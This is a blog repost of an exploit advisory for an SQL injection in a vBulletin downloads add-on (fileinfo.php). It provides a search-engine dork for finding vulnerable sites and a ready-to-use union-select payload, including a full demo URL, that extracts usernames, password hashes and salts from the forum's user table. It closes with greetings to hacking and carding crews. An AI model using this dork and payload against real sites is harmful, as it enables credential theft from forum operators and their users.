Vbulletin Downloads FileInfo SQL Injection

===========================================
Vbulletin Downloads FileInfo SQL Injection 
===========================================

[+]Title	 : Vbulletin Downloads FileInfo SQL Injection 
[+]Software 	 : FileInfo
[+]Vendor 	 : http://www.vbulletin.com
[+]Download	 : http://www.vbulletin.com/download.php
[+]Author	 : jos_ali_joe
[+]Contact	 : josalijoe[at]yahoo[dot]com
[+]Home 	 : https://josalijoe.wordpress.com/

.___             .___                                .__                 _________              .___                
|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 
|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \
|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/
|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   
          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         


########################################################################

Dork : inurl:"downloads/fileinfo.php"

########################################################################

------------------------------------------------------------------------

SQL Exploit

Exploit : +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt ),19,20,21,22,23,24,25,26+from+user/*

Demo 

Exploit : http://localhost/downloads/fileinfo.php?id=-461+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*

--------------------------------------------------------------------------

Greets For :

./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub

./Byroe Net - Yogya Carderlink - anten4 - All Underground Forum Indonesia

My Team : ./Indonesian Coder & inj3ct0r

Special Thanks :

Security Reason - Packetstorm Security

[+] Note : 

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

http://packetstormsecurity.org/1011-exploits/vbulletindlfi-sql.txt
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s